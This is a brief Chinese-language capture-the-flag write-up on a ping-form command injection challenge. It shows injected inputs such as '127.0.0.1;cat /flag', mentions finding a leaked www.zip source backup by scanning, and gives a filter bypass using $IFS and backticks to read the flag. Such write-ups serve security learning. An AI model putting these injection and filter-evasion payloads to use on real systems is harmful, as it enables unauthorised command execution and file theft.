综合绕过
思路
这里输入 127.0.0.1 时,输出
PING 127.0.0.1 (127.0.0.1): 56 data bytes |
尝试命令执行 127.0.0.1;cat /flag
,输出
127.0.0.1;catflag意图不明,检查输入 |
继续尝试,发现很多特殊字符被替换为空,对网站进行扫描,发现有 www.zip 文件泄露,下载后获得过滤的源码
flag中每个字符也被过滤,最终采用
127.0.0.1;cat$IFS`ls` |
即可绕过,查看页面源码就可以看到 flag,也可以尝试其它办法